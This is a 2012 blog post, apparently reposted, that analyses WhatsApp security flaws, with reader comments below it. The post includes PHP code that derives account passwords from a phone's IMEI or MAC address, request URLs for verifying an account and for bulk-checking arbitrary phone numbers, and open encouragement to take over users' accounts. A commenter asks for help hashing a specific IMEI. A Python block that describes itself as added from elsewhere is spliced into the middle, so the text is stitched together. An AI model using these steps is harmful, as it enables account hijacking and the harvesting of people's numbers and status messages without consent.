Whats up WhatsApp?

Posted: September 15, 2012 by BlackPian0 in Cyber Security, Mobile Security, Security Updates, Technology

WhatsApp, the extremely popular instant messaging service for smartphones that delivers more than 1 billion messages per day, has some serious security problems. This post gives a detailed analysis of some of them.

Encryption

Until August 2012, messages sent through the WhatsApp service were not encrypted in any way; everything was sent in plaintext. When using WhatsApp on a public WiFi network, anybody was able to sniff incoming and outgoing messages (including file transfers). The company claims that the latest version of the software encrypts messages.

However, the user's mobile phone number is still being transferred in plaintext: WhatsApp still revealing users phone number after encryption update

Authentication

The authentication is a security nightmare. On Android, the password is an MD5 hash of the reversed IMEI number:


<?php
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse the IMEI and take its MD5 hash
echo $androidWhatsAppPassword;

On iOS devices the password is generated from the device's WLAN MAC address:


<?php
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // MD5 hash of the MAC address concatenated with itself
echo $iphoneWhatsAppPassword;

The username is the user's mobile phone number – an attacker would probably already know the number.
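To make the weakness concrete, here is an added example (not code from the post or from WhatsApp) that reimplements the two derivations above in Python and contrasts them with a hypothetical hardened design: a random per-registration secret that is never derivable from a device identifier and is proven by HMAC challenge-response instead of being sent in a URL. The sample IMEI, MAC and phone number are constructed; `HardenedServer` and `client_respond` are illustrative names, not any real API.

```python
import hashlib
import hmac
import secrets

# Constructed sample identifiers; these are not real devices.
SAMPLE_IMEI = "112222223333334"
SAMPLE_MAC = "AA:BB:CC:DD:EE:FF"


def android_password_2012(imei: str) -> str:
    """Derivation the post describes for Android: md5(strrev($imei))."""
    return hashlib.md5(imei[::-1].encode()).hexdigest()


def ios_password_2012(wlan_mac: str) -> str:
    """Derivation the post describes for iOS: md5($wlanMAC.$wlanMAC)."""
    return hashlib.md5((wlan_mac + wlan_mac).encode()).hexdigest()


class HardenedServer:
    """Hypothetical alternative: the credential is 256 random bits issued at
    registration, unrelated to IMEI or MAC, and is proven by HMAC over a
    one-time nonce, so it never travels on the wire."""

    def __init__(self):
        self.keys = {}     # phone -> secret (server needs it to check the HMAC)
        self.pending = {}  # phone -> outstanding nonce

    def register(self, phone: str) -> bytes:
        secret = secrets.token_bytes(32)  # random, not derived from the device
        self.keys[phone] = secret
        return secret                      # handed to the device exactly once

    def challenge(self, phone: str) -> bytes:
        nonce = secrets.token_bytes(16)
        self.pending[phone] = nonce
        return nonce

    def verify(self, phone: str, tag: bytes) -> bool:
        nonce = self.pending.pop(phone, None)  # each nonce is usable once
        key = self.keys.get(phone)
        if nonce is None or key is None:
            return False
        expected = hmac.new(key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, tag)


def client_respond(secret: bytes, nonce: bytes) -> bytes:
    """Device side: prove possession of the secret without revealing it."""
    return hmac.new(secret, nonce, hashlib.sha256).digest()
```

The first two functions show that whoever learns the identifier recomputes the credential exactly; the hardened flow shows that a captured response is useless for replay because the nonce is consumed on first use.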

The IMEI can be obtained if you have physical access to the phone or if you control an app installed on the user's device. The WLAN MAC address can be found using a network sniffer. Congratulations, you can now take over a user's WhatsApp account¹. But how? Well, some people have done an excellent job reverse engineering the WhatsApp protocol. There is a working PHP class available that contains everything needed to build your own WhatsApp client: https://github.com/venomous0x/WhatsAPI

Got a smartphone with WhatsApp installed? Try it out yourself using the URLs known from the reverse-engineered API!

https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the user's phone number (without the country calling code)
$password = see above; for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei)). Note that the WhatsApp UDID has nothing to do with the Apple UDID – it is something completely different.

If you did everything right, the server will answer with an XML document:

Privacy

When WhatsApp starts, it sends all numbers from your phone's address book to the WhatsApp servers and checks which of them are registered with WhatsApp.

This is done like this:

https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4

$countrycode = the country calling code
$yournumber = while this SHOULD be your number, it is not required; the API will accept any number
$friendX = phone number (without the country calling code) from the address book that will be checked; u[] is an array, so it is possible to check multiple numbers with one request

The server will answer with an XML document listing all numbers (hits) that are registered with WhatsApp. It looks something like this:

Key “P” is the user's phone number, key “T” seems to be the uptime(?), and key “S” is the user's status message. JID is the Jabber ID. What “NP” means is not clear yet – if you have a smart guess, let me know. All this information is public.

Local database encryption

Since this requires physical access to the device or a full backup (in both cases you are screwed anyway), this is less interesting but still worth a note. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup; for details read this paper: WhatsApp Database Encryption Project Report

Conclusion

Do not use WhatsApp. Really, don't.

Credit: geeknizer

Comments
  1. Eitan says:

    tnx for your post! do you have the source files of the WhatsApp api project?

  2. blackrose says:

    Hallo sir,
    could you please help me? I don't understand how I can calculate the MD5 from the IMEI manually.
    The IMEI is 36828900211284

  3. Highly energetic blog, I enjoyed that a lot. Will there be a part 2?
